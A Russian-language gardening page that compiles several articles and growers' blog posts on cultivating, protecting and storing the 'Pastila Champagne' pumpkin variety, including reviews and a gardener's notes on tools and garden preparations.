11 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Тыква пастила шампань описание сорта

Мясистый и легкий сорт тыквы «Пастила Шампань» с сочной мякотью и неповторимым ароматом

У этого розового овоща яркий ванильный аромат, необычный внешний вид, длительные сроки хранения и неприхотливый характер. Речь об экстравагантном сорте тыквы с красивым названием Пастила-шампань.

Расскажем все об этой культуре: особенностях выращивания, секретах хорошего урожая и его применении. А в конце статьи вы найдете отзывы фермеров, уже успевших вырастить этот овощ.

Описание и характеристика сорта

Тыква Пастила-шампань – сорт среднеспелый. Куст растения — среднего размера и занимает небольшую площадь на участке.

Отличительные черты

Тыква Пастила-шампань отличается от других сортов необычной формой и расцветкой. Это видно на фото. Плод разделен на небольшие сегменты, со светлыми пятнами на кожуре. Другая отличительная черта сорта – он хорошо переносит транспортировку на большие расстояния и долго хранится, не теряя товарного вида и вкусовых качеств.

Характеристика плодов

Плоды тыквы Пастила-шампань удлиненные в форме эллипса. Масса одной тыквы – 2-3 кг. Кожура плотная, но не толстостенная, розоватого оттенка.

Мякоть тыквы мясистая, ярко-оранжевого цвета с приятным ванильным ароматом, на вкус сладкая. Семенная камера расположена вдоль всего плода, она глубокая, но сами семечки маленькие.

Урожайность

Урожайность у сорта средняя. С одного куста при должном уходе можно собрать 3-4 тыквы.

Как выращивать

Для хорошего урожая тыквы важно правильно выбрать место ее посадки. А потом выполнять соответствующие мероприятия по уходу за растением. Первый важный этап — подготовка посевного материала.

Подготовка семян

Сначала тыквенные семечки в течение месяца прогревают возле обогревательного прибора (например, на батарее). Это повышает шанс получить больше женских цветков, а значит, вырастить более крупный урожай.

Следующие этапы:

  1. Отбирают семена, выбрасывая пустые. Для определения пустых помещают семя в раствор соли. Те, что не утонут, – пустые и для посадки не годятся.
  2. Закаливают семена. Посевной материал, завернутый во влажную ткань, выдерживают три дня в холодильнике. Это поможет всходам быстрее адаптироваться к переменам погоды.
  3. Проводят дезинфекцию. Перед посадкой семена замачивают на 10 часов в слабом растворе марганцовки или воде с соком алоэ.

Посадка

Тыкву этого сорта большинство садоводов высаживают непосредственно в грунт без предварительного выращивания рассады. Лучшее время для посадки семян – конец мая. Место для растения выбирают солнечное, укрытое от сквозняков.

Если есть желание или погодные условия региона неблагоприятны, выращивают рассаду. Делают это в конце апреля, а к середине мая переносят в грунт под пленку. Растение сразу после посадки обильно поливают. Пленку снимают через 3-4 недели.

Семена перед посадкой проращивают. Для этого замачивают их в воде на 2-3 часа, затем выкладывают на мокрую ткань и накрывают. Оставляют на 3-4 дня. После этой процедуры из семечек появятся ростки, и их можно будет посадить в отдельные емкости, углубляя в грунт на 5-7 см. Хорошо подойдут торфяные горшки.

Схема посадки ростков в грунт: 1,5 х 1 м (расстояние между рядами и растениями соответственно). Предварительно в каждую лунку вносят 5-6 кг перегноя и по 2 ст. л. органического удобрения. Культура хорошо растет на компостных кучах.

При уходе за этим сортом важно соблюдать регулярность поливов. Начинают с небольшого количества воды (2-3 л), постепенно его увеличивая по мере роста растения (до 10 л). Поливать следует под саженец. Когда плоды достигнут максимальных размеров, полив прекращают, иначе овощи будут безвкусными и могут сгнить.

Подкармливают растение 2 раза в месяц. Для этого подойдут коровий навоз и комплекс органического удобрения в равных пропорциях. Удобрять культуру этими средствами можно до конца июля. С августа лучше использовать только подкормку, содержащую калий. Она помогает плодам скорее дозревать.

Особенности выращивания и возможные трудности

Пастила-шампань хорошо плетется, поэтому перед тем, как плоды начнут завязываться, рядом можно установить сетку. Плети будут на нее взбираться.

Лишние завязи убирают, чтобы не перегрузить плеть. Оставляют по 4-5 штук, которые подвязывают шпагатом.

Бывают случаи, когда Пастила-шампань не растет из-за неправильно подобранного места высадки. Из-за отсутствия достаточного тепла и света растение может вообще не дать урожая.

Советы по выращиванию от овощеводов

В выращивании тыквы и уходе за ней есть свои особенности. Для получения хорошего урожая опытные огородники рекомендуют:

  1. Тщательно отбирать и подготавливать посевной материал.
  2. Соблюдать правила севооборота: сажать тыкву на одном и том же месте только раз в 3-4 года.
  3. Не культивировать рядом бахчевые культуры (кабачки, дыни, огурцы).
  4. Соблюдать расстояние между растениями. Не загущать посадки.
  5. Перед завязыванием плодов обрабатывать растение средствами от болезней и разных вредителей.
  6. Регулярно пропалывать сорняки. В них содержатся грибковые споры, вызывающие бактериоз.
  7. Подкармливать тыкву комплексными минеральными удобрениями (медным купоросом, борной кислотой с мочевиной, калием перманганатом, цинком сернокислым).
  8. Регулярно осматривать посадки на предмет болезней и вредителей.
  9. Своевременно удалять зараженные растения и плоды.
  10. Прищипывать основной стебель тыквы при достижении им длины 1,5 м.
  11. Сокращать поливы в конце лета (примерно за две недели до сбора урожая).

Болезни и вредители

Защита растения от болезней и вредителей – важный момент в уходе за ним. У тыквы Пастила-шампань средняя стойкость к заболеваниям. К примеру, бактериоз способен уничтожить весь урожай. Важно его обнаружить сразу же, не допустив эпидемии.

Первые его признаки:

  • потемневшие и уже начавшие гнить плоды;
  • язвы бурого цвета;
  • неравномерный рост плодов.

Если нашли зараженный куст, сразу убираете его с участка. Остальные растения нужно обработать бордосской жидкостью.

Из вредителей опасайтесь тли и паутинного клеща. Чтобы они не размножались, кусты опрыскайте раствором из луковой шелухи. Для его приготовления 4 стакана шелухи заливают 2 л горячей воды и настаивают двое суток. Затем настой процеживают и разводят водой в равных пропорциях. Обрабатывают не менее трех раз с перерывом в неделю.

Сбор и применение урожая

Сбор урожая приходится на конец сентября-начало октября. Спелость плода проверяют по плодоножке. У спелой тыквы она затвердевает и начинает подсыхать. Собирают тыквы обязательно с плодоножками, иначе долго они храниться не будут. При комнатной температуре Пастила-шампань лежит до 3-4 месяцев без потери вкусовых качеств.

Важно! Складывать плоды следует плодоножкой вверх и так, чтобы они друг с другом не соприкасались. Для длительного хранения отбирают овощи без повреждений и выраженных пятен.

Применение

Этот сладкий овощ хорош практически в любом виде. Сырым его добавляют в холодные закуски и салаты, делают тыквенный фреш. Пастилу-шампань запекают, тушат, готовят из нее различную выпечку, супы-пюре и каши.

Многим она придется по вкусу в сочетании с мясом, и даже просто запеченные ломтики этого овоща со сметаной или майонезом сойдут за деликатес. А за сладость эту тыкву любят даже дети.

Преимущества и недостатки сорта

Плюсов у сорта немало, но есть и минусы. Обо всем по порядку.

Плюсы:

  • приятный вкус и аромат;
  • много мякоти;
  • удобная форма плодов;
  • устойчивость к засухе;
  • долгий срок хранения;
  • высокая транспортабельность.

Минусы:

  • предрасположена к вирусным заболеваниям и поражению вредителями;
  • требовательна к уходу;
  • не переносит повышенной влажности и морозов.

Отзывы фермеров

Многим овощеводам тыква Пастила-шампань пришлась по душе. Они отмечают и ее вкус, и универсальность применения, и урожайность.

Елена: «Посадила 2 семечка в грунт 27 мая. На двух растениях получилось вырастить 3 тыквы (весом 2, 4 и 10 кг). Завязывалось много маленьких тыквочек, но, скорее всего, из-за холодного и мокрого июля они подгнивали. Вкус свежей тыквы сладковатый и очень приятный, консистенция плотная, аромат дынно-огуречно-арбузный. Больше понравилась в сыром виде. Кожура не твердая, достаточно легко срезается. Разрезанная плохо хранится».

Екатерина: «Приятный свежий аромат. Без тыквенного запаха и вкуса. Приятно сладкая. И в свежем, и в запеченном виде. На одной плети выросло 2 тыквы по 1,5 и 1,7 кг. Маловато, но лета у нас вообще не было, так что довольна и этим. Удивительно, что в таких холодных и дождливых условиях тыквы оказались даже сладкими».

Марина: «Тыкву Пастилу-шампань я стараюсь выращивать регулярно, сорт самый любимый. Длина главной плети 4-5 метров. Вес самой большой тыквы получился 6 кг, а самая маленькая около 3 кг, как и заявлено в аннотации. Окраска плода бежево-розового оттенка. Семенная камера небольшая. Когда вызрела, по внешнему виду напоминала дыню-торпеду. Очень ароматная и вкусная и для тыквы достаточная сочная. Рассаду посадила 25 апреля в торфоперегнойные горшочки, в грунт с укрытием — 15-17 мая. В сентябре собрала урожай».

Заключение

Многие огородники по достоинству оценили сорт Пастила-шампань. Среди положительных свойств тыквы отмечают универсальность в употреблении и большой срок хранения.

Сорт требует большего ухода, чем привычные популярные сорта. Но все трудозатраты окупятся качеством плодов. А в правильно подобранном месте даже при минимальном уходе с одного куста можно собрать не менее трех тыкв.

Выращивание тыквы Пастила-шампань

Тыква знаменита своими вкусовыми качествами. Ее можно назвать непривередливым овощем. Примечательным представителем этой культуры является тыква Пастила-шампань, которая отличается конусовидной формой и розовым цветом кожуры.

Выращивание тыквы Пастила-шампань

Характеристика сорта

Пастилу-шампань можно легко отличить от других сортов. Она имеет необычные форму и оттенок. Разделена она на небольшие сегменты, имеет светлые пятна на кожуре.

Описание указывает на то, что куст средних размеров, плетется, не занимает большую территорию на огороде. Масса одного плода – 2-3 кг. На кусте вырастает 3-4 тыквы, если растение получает достаточно света и тепла.

Кожура плотная. Мякоть мясистая, ярко-оранжевого цвета, приятного сладковатого вкуса. Отмечают ее ванильный запах. Семенная камера расположена вдоль всего плода, она глубокая, но сами семечки маленькие.

Сорт поддается транспортировке на большие расстояния и долго хранится, не теряя товарный вид и вкусовых качеств. Из тыквы делают сок, кашу, пюре, супы, ее запекают, варят, тушат, готовят на пару.

Достоинства и недостатки

  • удобная форма плодов;
  • много мякоти;
  • приятный вкус и аромат;
  • устойчивость к засухе;
  • высокая транспортабельность;
  • долгий срок хранения.

Есть и несколько минусов. Из-за того, что кожура средней плотности, растение поддается поражению разными бактериальными и вирусными заболеваниями. Нужно тщательно ухаживать за сортом. Тыква не обладает высокой стойкостью к морозам и повышенной влажности.

Особенности выращивания

Чтобы растение дало хороший урожай, требуется правильно его посадить и ухаживать за ним. Бывают случаи, когда Пастила-шампань не растет, потому что садоводы подбирают неправильное место для ее культивирования.

Посадка

Семена к посадке необходимо подготовить

Осуществляют посев непосредственно в грунт, не готовя заранее рассаду. Лучшее время для посадки семян – конец мая. Хотя культура растет без рассады, рекомендуют не исключать этот метод.

Семена нужно замочить в воде на пару часов, выложить в мокрую ткань и накрыть, оставив на 3-4 дня. После такой процедуры из них начнут появляться первые ростки, поэтому их можно будет посадить в отдельные емкости, углубляя на 5-7 см в грунт. Подойдут для этого торфоперегнойные горшки.

Лучшее время для посева – конец апреля. В середине мая можно переносить рассаду в грунт под укрытие.

Сажают ростки в грунт по схеме 1,5 х 1 м. В каждую лунку перед этим вносят 5-6 кг перегноя и по 2 ст. л. органического удобрения. Хорошо растет культура на компостных кучах. Сразу рассаду нужно хорошо полить, а пленку снять через 1 месяц.

Ухаживать за тыквенным кустом несложно.

Нужно регулярно поливать растение. Начинаем с небольшого количества воды (2-3 л), которое увеличивается по мере роста куста (до 10 л под сеянец). Когда плоды достигают максимальных размеров, полив лучше прекратить, чтобы овощи не сгнили.

Подкармливать растение нужно 2 раза в месяц. Для этого подойдут коровяк и комплекс органического удобрения в равных пропорциях. Удобрять культуру этими средствами можно до конца июля. С августа лучше использовать только подкормку, которая содержит калий, потому что она помогает плодам скорее дозревать.

Пастила-шампань хорошо плетется, поэтому, перед тем как плоды начнут завязываться, рядом можно установить сетку, на которую будут взбираться плети. Лишние завязи нужно убрать, иначе плеть оборвется. Оставляют по 4-5 штук, которые подвязывают шпагатом.

Перед завязыванием растения обрабатывают средствами против болезней и разных вредителей. Собирают урожай в конце сентября или в начале октября. Тыква спелая, если ее плодоножка затвердела и начала засыхать.

Срывают плоды только с плодоножками, без них они храниться не будут. Оптимальными условиями является содержание культуры при комнатной температуре. В этом случае плоды хранятся до 3-4 месяцев.

Тыква Пастила Шампань: описание сорта

Тыква Пастила Шампань создана селекционерами на базе агрофирмы “Биотехника”. Основным направлением в гибридизации стало создание культуры, дающей урожай вне зависимости от погодных условий. Выращивают культуру сорта в условиях умеренного климата Подмосковья, Урала, Сибири в незащищенном грунте.

Описание тыквы Пастила Шампань

Тыква сорта Пастила Шампань среднепозднего срока созревания, плоды достигают биологической спелости за 3 месяца. Растение компактное, со средним побегообразованием. Чтобы сэкономить место на участке, рекомендуется установка опоры, подвязка плетей и плодов.

Внешняя характеристика сорта тыквы Пастила Шампань:

  1. Культура высокорослая индетерминантного типа, нуждается в корректировке высоты и формировании куста. Побеги толстые с ребристой структурой, мелко опушенные, светло-зеленые. Усы длинные и толстые, при установке шпалеры их полностью удаляют.
  2. Листья округлые пятилопастные, закреплены на толстых, коротких черенках. Листовая пластина ярко-зеленая слаборассеченная, прожилки четко определяемые, на тон темнее листа. Листья супротивные, облиственность средняя.
  3. Цветки крупные, ярко-желтые, обоеполые.

Тыква сорта пастила Шампань самоплодная, опылители не требуются.

Описание плодов

Тыква сорта Пастила Шампань отличается необычной для культуры формой и окраской плодов. Ценится среди овощеводов за гастрономические достоинства.

Описание плодов сорта Пастила Шампань:

  • форма вытянутого эллипса, масса – 2,5-3,5 кг;
  • поверхность ровная, разделена по вертикали на несколько сегментов, цвет розовый с небольшими белыми фрагментами, сетчатая;
  • кожура жесткая, тонкая;
  • мякоть оранжевого цвета, плотная, сочная;
  • семенные отделы глубокие, расположены по всей длине плода, семена белые, плоские, мелкие.

Вкус у тыквы сорта Пастила Шампань сладкий с ванильным ароматом. Плоды универсального использования, употребляют свежими. Перерабатывают на сок, пюре. Тыкву тушат, запекают, готовят на паровой бане, используют для приготовления рисовой или пшенной каши.

Выращивают тыкву сорта на даче, приусадебном участке, подходит для коммерческой культивации на больших фермерских территориях. Хорошо переносит транспортировку на большие расстояния.

Характеристики сорта

Тыква сорта Пастила Шампань создана специально для выращивания в умеренном климате. Травянистое растение не прекращает вегетации при +16 0 C. Показатель говорит о морозоустойчивости сорта. Высаживают тыкву на участок, когда нет угрозы заморозков, молодая поросль редко повреждается морозами. В случае подмерзания молодых побегов, культура хорошо восстанавливается, негативное воздействие не отражается на сроках и уровне плодоношения. Плоды созревают одновременно, имеют выровненную форму, сбор урожая проводят в конце августа или середине сентября.

Тыква Пастила Шампань – теплолюбивое растение, для вегетации требуется избыток ультрафиолета. На затененном участке тыква перестает цвести, завязи осыпаются, продуктивность низкая. Не подходит для культуры место с воздействием северного ветра. Засухоустойчивость у тыквы средняя, растению необходим полив. В то же время плохо переносит переувлажнение грунта, корневая система поверхностная, склонная к загниванию. Предпочитает нейтральный грунт, плодородный, без застоя воды. Оптимальный вариант для выращивания – дренированные супесчаные почвы.

Формируют куст сорта Пастила Шампань двумя побегами – основным и первым пасынком. Боковые отростки по мере формирования удаляют. На одном кусте оставляют 5 завязей, распределяют их между стеблями, остальные цветки и плоды убирают. Таким образом, разгружают растение. Все питательные вещества направлены на созревание плодов. На 1 м 2 высаживают 2-3 растения, средняя урожайность – около 20 кг.

Устойчивость к вредителям и заболеваниям

Самый распространенный вредитель на тыкве Пастила Шампань – тля. Появляется в середине лета, основное место локализации насекомых – нижняя часть листа и цветки. Листья на месте скопления тли желтеют и скручиваются, цветки опадают. Чтобы избавиться от вредителя, делают раствор. Ингредиенты рассчитаны на 10 л воды:

  • лук, пропущенный через мясорубку –200 г;
  • красный перец – 4 ст. л;
  • древесная зола – 50 г;
  • жидкое мыло (хозяйственное) – 50 г.

Субстанцию процеживают, обрабатывают куст, через 5 дней процедуру повторяют.

Если метод не дал положительного результата, культуру опрыскивают препаратом «Фитоверм» или «Искра», разводят по инструкции к средству.

Реже паразитирует белокрылка, от нее поможет избавиться «Командор».

При переувлажнении почвы и загущенной посадке развивается бактериальная гниль плодов. Поражает растение на любой стадии вегетации, плодоножка темнеет, затем плод опадает. Для устранения бактериальной инфекции уменьшают полив, удаляют инфицированные участки, обрабатывают «Хомом».

Возможно развитие грибкового заболевания – мучнистая роса. Проявляется белыми пятнами на листьях, эти места сохнут, листья отмирают. Применяют против грибка коллоидную серу, препарат «Топаз».

Достоинства и недостатки

По отзывам овощеводов, тыква сорта Пастила Шампань за долгие годы выращивания зарекомендовала себя только с хорошей стороны:

  • морозоустойчивая, на урожайность не влияет понижение температуры;
  • успевает вызреть в условиях короткого лета и в регионах с умеренным климатом;
  • не требует особенного ухода;
  • можно выращивать как со шпалерой, так и без нее;
  • плоды обладают экзотическим внешним видом;
  • универсальная в применении;
  • длительно сохраняет товарный вид;
  • подходит для коммерческого выращивания;
  • обладает хорошим вкусом и ароматом;
  • дает полноценный посадочный материал.

К недостаткам можно отнести то, что тыква нетерпима к переувлажнению почвы. Устойчивость к вредителям и болезням средняя. Необходимо каждые 3 года менять семена.

Технология выращивания

Культуру сорта Пастила Шампань разводят на участке прямой посадкой семян в грунт. Растения плохо укореняются после пересадки. Рассадный способ применяют в регионах с более холодным климатом, чем, например, в Центральной России, а также с коротким летом. Рассадный способ поможет сократить срок созревания. Для посадки семян на рассаду их предварительно проращивают. Заворачивают в мокрую ткань и оставляют в теплом месте. Через 4-5 дней появятся ростки. Последующая работа:

  1. Плодородную почву засыпают в пластиковые или торфяные стаканы.
  2. Делают углубление на 3 см.
  3. Аккуратно, чтобы не повредить росток, кладут семечку с расчетом 1 семя на 1 емкость.
  4. Поливают, устанавливают в ящик или контейнер, накрывают пленкой.
  5. Убирают в освещенную комнату.

После появления поросли пленку убирают. Посадку проводят в начале апреля.

На участок тыкву высаживают в конце мая с условием, что земля прогрелась до +16 0 C, сроки одинаковые для рассады и прямой посадки. Перед прямой посадкой семечки отбирают, помещают на 10 дней в холодильник, затем проращивают.

  1. Участок перекапывают.
  2. Убирают остатки травы.
  3. Вносят органику и мочевину.
  4. В каждое углубление кладут золу и семечку, поливают, засыпают.

Схема расположения: междурядье – 1,5 м, расстояние между тыквами – 75 см.

  1. Растение до формирования плодов поливают каждый вечер небольшим количеством воды. Объем жидкости увеличивают по мере роста. После первой подвязки растений полив сокращают до 2 раз в неделю, прикорневой круг мульчируют соломой или компостом.
  2. Убирают боковые побеги, усы и сухие листья, формируют двумя стеблями.
  3. Куст подвязывают, убирают лишние завязи.
  4. Подкармливают культуру сорта Пастила Шампань органикой, фосфатом, за месяц до уборки вносят калий. Органику можно вносить без ограничения, от излишков вреда тыкве не будет.
  5. Прополку и рыхление проводят по мере роста сорняков.

В профилактических целях посадки сорта опрыскивают противогрибковым препаратом. Собирают урожай в сентябре. Когда засохнет плодоножка, срывают тыкву вместе с ней. С плодоножкой плоды хранятся дольше. Тыкву после сбора кладут в помещение с хорошей вентиляцией, влажностью воздуха – 85%, температурой – +5-10 0 C.

Заключение

Тыква Пастила Шампань – морозоустойчивый сорт среднепозднего срока созревания. Создавалась культура для открытого грунта, выращивают в европейской, центральной части России. Плоды универсальные в использовании, обладают сладким банановым вкусом и тонким ванильным ароматом. Тыква подходит для выращивания на больших и маленьких участках. Визитной карточкой сорта является необычная форма и цвет плодов.

Тыква «Пастила Шампань»

Тыква «Пастила Шампань»

Тыква «Пастила Шампань»

А сейчас хочу рассказать об открытии этого сезона — плетистой тыкве Пастила Шампань. Низкий поклон всем, кто мне помог достать семена этой изумительной тыквы: в прошедшем сезоне их не было ни в одном питерском магазине. С большим трудом их нашли в Москве, и я стала счастливой обладательницей двух семян. Но из двух взошло только одно, так что дрожала над ним — не то слово. Но и ему досталось.

Мама приняла привезенную на дачу рассаду тыквы за огурец и посадила ее в парник к остальным огурцам! Я заметила только через неделю, что в общей куче тыкв не хватает Пастилы. Была почти истерика. В результате только в середине июня я высадила ее на постоянное место. Там, куда планировала посадить, места уже не было, так что решила поэкспериментировать.

В куче с прошлогодним навозом, закрытым пленкой, сделала большую яму — литров на 20, прорезав пленку. Засыпала ее компостом и пересадила бедную малышку. Пошла в рост она значительно позднее, чем все остальные, поэтому, видимо, не успела себя показать в полной красе. Ей бы еще полмесяца-месяц. Тогда бы, наверное, я всех соседей одарила плодами .

Вот что выросло из одного маленького семечка. А в зарослях листьев созрели такие красавицы На тележке перевозили собранный урожай тыкв.

Очень много было мелких тыковок — не хватило им времени. Но я не жалуюсь. И сырой я ее ела — изумительна на вкус. А запах, когда ее разрезали, вообще умопомрачительный был — вся квартира благоухала ароматом дынного меда. Кашу с ней ребенок ест в любое время — только предложи. Очень много нагнали сока — с яблоками и черноплодкой. Такая вкуснятина получилась, что хватило ненадолго. Одним словом, Пастила Шампань — удивительная находка для всех ценителей такой замечательной культуры, как тыква.

Рис. 10. Тыква «Пастила Шампань»

Я несколько раз в своем рассказе упоминала инструменты и препараты, которые помогли получить такой урожай и которые составляют единое целое с агротехникой природного земледелия. Начну с инструментов. У меня с детства трепетное отношение к ним. Первой лопатой, которую мне подарили в пять лет, я до сих пор работаю на даче. Участок у нас относительно недавно — четвертый сезон, мужской силы для обработки земли у меня нет, поэтому сразу же встал вопрос о подходящем садовом инструменте.

Отмахав первый сезон лопатой, я поняла: это не мое. С этого момента начался поиск. Три года назад мне крупно повезло — из брошюры про ЭМ-технологии я узнала о существовании полольников «Стриж» и другого инструмента из серии «Козьма». Одного взгляда на стенд с этими инструментами в магазине фирмы АгроЭм было достаточно, чтобы понять: это то, что мне нужно.

Этот инструмент был придуман и запатентован около семи лет назад ученым-физиком Борисом Козьменко. К сожалению, найти его в открытой продаже до сих пор сложно. Уникальность всей серии состоит в том, что весь инструмент изготовлен из высокоуглеродистой стали с самозатачивающимися лезвиями.

Сегодня эта серия насчитывает более 15 позиций, но я, перепробовав практически все, хотела бы рассказать о своих любимых.

Очень многие садоводы-любители сейчас отказываются от перекопки земли — кто-то по состоянию здоровья, кто-то осознанно, понимая, что глубокая перекопка нарушает структуру почвы.

На сегодняшний день практически всю основную работу на земле я выполняю плоскорезом «Козьма». Это подготовка всех грядок без исключения к посеву, послеуборочная обработка почвы (перед севом сидератов). Срезка и заделка самих сидератов, рыхление почвы под кустами и в других труднодоступных местах. Срезка сорняков вдоль забора дома, на тропинках. Я даже картофельное поле им обрабатываю. Вот, например, эта небольшая клумба (см. фото 13) тоже сделана «Козьмой» — вот он, на заднем плане, отдыхает.

Рис. 11. Урожай тыквы

У меня много таких «ленивых» клумб по всему участку. Делается она очень просто — срезаешь дерн «Козьмой», ограничиваешь бордюром площадь будущей клумбы, засыпаешь слой полуперепревшего компоста, потом слой плодородной земли. Все это закрывается толстым черным спанбондом и мульчируется кокосовым субстратом.

При посадке цветов — здесь посажены лилии — делается надрез на спанбонде, затем — лунка, подсыпается еще земля, если нужно, и высаживается само растение. Все очень быстро и просто. Соседи сначала очень настороженно относились к «Козьме», потом стали просить попробовать.

Сейчас уже все работают только им. Немножко дегтя: инструмент изумительный, но не обольщайтесь, что он сам будет работать за вас. Для срезки дерна, чистки дорожек и т.п. все равно нужна сила. Заслуга инструмента в том, что работать от себя намного легче — работает вес вашего тела, и сам он довольно острый — с лазерной заточкой.

Уже два года я работаю «Козьмой», и за все время эксплуатации в жестких условиях моего участка инструмент такой же острый, как в первый день.

А теперь несколько слов о препаратах, которые я использую. Для профилактики болезней, вызываемых болезнетворными микроорганизмами, я применяю препарат Экстрасол-55 — разработку ВНИИСХМ РАСХН. Этот препарат представляет собой чистую бактериальную культуру в форме жидкой суспензии, подавляет развитие очень широкого спектра болезней, в т.ч. различного рода гнилей, за счет заселения почвы полезной микрофлорой.

Также этот препарат обладает способностью фиксировать атмосферный азот, синтезировать гормоны роста и витамины, переводить в доступные формы соединения фосфора и микроэлементы. Так как он предназначен большей частью для профилактики, то пользоваться им нужно регулярно. Я начинаю опрыскивание земляники через две недели после посадки и опрыскиваю до конца сезона с интервалом в две недели.

Кроме того, не последнюю роль в уходе я отвожу гомеопатическому препарату «Здоровый сад». Рассмотрим его действие на примере земляники. Этой культурой я занимаюсь уже пять лет, и с самого начала ни один год не проходит без визита долгоносика. Я являюсь сторонницей органического земледелия, поэтому традиционные меры борьбы с этим вредителем, мягко говоря, мне не подходят. Особенно тяжело читать, когда в целях профилактики появления долгоносика рекомендуют в течение первой половины вегетации опрыскивать растения каждую неделю Интавиром.

Рис. 12. Полольник Козьма

Для того чтобы научиться подавлять численность вредителя, нужно, прежде всего, понять, почему вредители нападают на ту или иную культуру. В брошюре авторов препарата «Здоровый сад» В. С. Коваленко и Т. В. Коваленко и садовода-практика Г. А. Кизимы дано очень простое и понятное объяснение: «Дело в том, что здоровые растения быстро синтезируют белок, необходимый растениям, чтобы наращивать свое тело, особенно листовой аппарат.

А вот в ослабленных растениях синтез по тем или иным причинам идет медленно. Растение в основном вырабатывает углеводы. . Вредители, как насекомые, так и клещи, питаются в основном углеводами. . Нормализуя баланс между углеводами и белками в клеточном соке растений, тем самым защищаем растения от нападения вредителей».

Растения после зимы всегда выходят несколько ослабленными. Это вполне нормально и естественно. Кроме того, весной наблюдается порой очень сильное несоответствие температуры почвы и воздуха, т.е. фотосинтетический аппарат уже работает в полную силу, а корни еще спят. Это тоже приводит к белково-углеводному дисбалансу, т.к. корневая система играет далеко не последнюю роль в работе белкового аппарата клетки.

Рис. 13. Ленивая клумба

Все эти, казалось бы, прописные истины я узнала сравнительно недавно. А несколько лет назад я приобрела этот препарат на выставке скорее из любопытства и уважения к гомеопатии в целом. После обработки «Здоровым садом» в растениях активизируется синтез белка, его количество в клеточном соке возрастает, а содержание углеводов уменьшается.

Но этот препарат дает результат только при систематических обработках. Я обрабатываю им растения раз в месяц, начиная со схода снежного покрова. В этом году собираюсь интервалы между обработками в весенний период сократить до одной недели, тем самым отказавшись от применения еще одного препарата, которым также приходилось пользоваться, — фитоверма. Останавливают две вещи — третий класс опасности препарата (фитотоксичность для рыб и пчел), а значит, автоматически отпадают обработки во время цветения.

И еще его безопасность для человека. В инструкции написано, что он абсолютно безопасен для человека, почему же тогда овощи и фрукты после обработки можно применять только через два, а по некоторым данным и через двадцать дней!

Ирина Веженкова, садовод, победитель конкурса «Дачный сезон — 2007»
Фото автора

О барыне-тыкве замолвите слово

Ну вот, я все-таки решилась написать про тыкву. В нашей семье так и не полюбилась она никому, хотя в полезности ее свойств никто и не сомневается. Каждый год пробую сажать новые сорта в надежде, что одна из них покорит мое сердце и прочно войдет в наш дом.

И этой весной все повторилось.
Набрала разных семян, правда, перед этим прочитав много положительных отзывов садоводов-огородников. Когда пришло время сеять, поняла, что все это богатство не уместится на моих сотках, поэтому остановилась на 4 сортах.
Это Тыква Дюшес, Цукат, Пастила-Шампань и Марина из Киоджа.

Раньше я сажала тыкву двумя способами: рассадным и семечкой сразу в землю.
Сейчас, в основном, использую рассадный. Поэтому семена сажаю в горшочки в 20-х числах апреля и ставлю их в поликарбонатную теплицу. На 5-8 день замечаю, что семечко проросло. Уже на 20-25 день у рассады появляется третий листик, и тогда я высаживаю ее в ОГ.
В подготовленную ямку кладу немного компоста и куриного помета. Поливаю и ставлю дуги. Накрываю временно спанбондом, так как вечерами и ночами бывает еще холодно. Знаю, что желательно сажать тыковки друг от друга на расстоянии 1 метра, но мне приходится высаживать чаще. Тыква любит полив и не любит холодную воду. Подкармливаю настоем сброженной травы и бражкой с добавлением куриного помета.

Мы все знаем, что тыква имеет питательную ценность. Ученые обнаружили в ней редкий витамин Т и К. Один из них способствует отличному усвоению тяжелой пищи. Кроме того, в тыкве много микроэлементов.
А какая низкая калорийность. Всего 22 калории в 100 граммах!

Обычно формирую тыкву в один или два стебля. На главной плети оставляю два плода, на боковой один, затем после плодиков идут 2-3 листа, которые тоже оставляются, а вся остальная верхушка удаляется. В этом году столкнулась с тем, что некоторые завязи загнивали. Поняла, что это связано с плохой погодой и, прочитав на нашем сайте советы, решила искусственно опылить цветки тыквы. Но тут на глаза попалась маленькая баночка меда, которую я тут же развела в воде и побрызгала все цветочки. После этого с плодами все было отлично.
Итак, хочется написать про каждую тыковку отдельно

1. Цукат

«Лежу, хорошею, теплом набираюсь.
Расту и круглею, ну, вообщем, стараюсь!
Вот только беда — скучно мне в огороде.
Уйти бы гулять, да не выросли ноги»

Вот эти 3 оранжевые — сорт Цукат:

2. Пастила-Шампань

Семена от Биотехники. Вкусное название, раннее. Форма вытянутого эллипса. Обещают, что мякоть будет занимать почти все внутреннее пространство и имеет ванильный аромат.
Ну что… попробуем. Один плодик у меня оторвался еще в конце июля и дозаривался на окошке. Вот видно, что у него окрас более насыщенный, но он маленький.

Этим летом было много дождей, поэтому, чтобы тыквы не подгнили, кладу под них дощечки

3. Марина из Киоджа

Семена от Биотехники Признаюсь, что на эту тыкву я возлагаю большие надежды. А из Вас друзья, кто-нибудь сажал такую?
Вот что гласит описание этого сорта: «Эта тыква считается одной из самых причудливых и уникальных тыкв Италии» Легенда гласит, что море подбросило жителям Киоджа — небольшого рыбацкого городка на севере Италии тыкву — наследие моря. Итальянцы называют эту тыкву Морским чудовищем.»
Сорт этот средне-поздний. Плоды с морщинистой коркой. Может храниться более года. Я же уже увидела один недостаток в этой тыковке. Чистить ее будет очень неудобно, но если вкус будет отменным, то прощу ей такие мелочи.

«Похожей так хочется стать на девчонку —
носить сарафан, иль хотя бы юбчонку»

Чем-то похожа на декоративную… правда? Вот такая у меня была декоративная

Ну что ж, попробуем.

4. Дюшес

Хотелось посадить и маленькие тыковки. Семена от Русского огорода.
Плоды имеют декоративный вид… да и обещают отменный ореховый вкус. Раннеспелые.

Обычно тыквы у меня хранятся максимум до февраля. А вот одна из них, которую я сажала пару лет назад, досидела до мая… возможно и дольше бы долежала. Называется «Медовая принцесса»
Смотрите… не усохла, не подгнила, а во время разреза был какой-то арбузный запах. Снимала ее зеленой, а во время лежки приобрела сначала апельсиновый цвет, а затем и золотисто-коричневый

Ну, в завершение можно сказать о болезнях тыквы.
Мучнистая роса. В прошлом году я снимала тыквы, а листьев практически не было… они все были поражены мучнистой росой и почти засохли. А в этом листья до сих пор зеленые. Слизней в этом году тоже достаточно. Знаю, что они могут нанести большой вред тыковке, которая почти готова, но еще лежит и нежится, пока хозяин ее начнет убирать. Поэтому, как могла, боролась с ними.

«Там, на солнышке сверкая, дремлет тыква золотая
И растет, растет, растет, заполняя огород!
Если солнце припечет, если дождичек польет,
То одной огромной тыквы хватит нам на целый год!
Будем жарить, печь, томить. Будем кашу с ней варить.

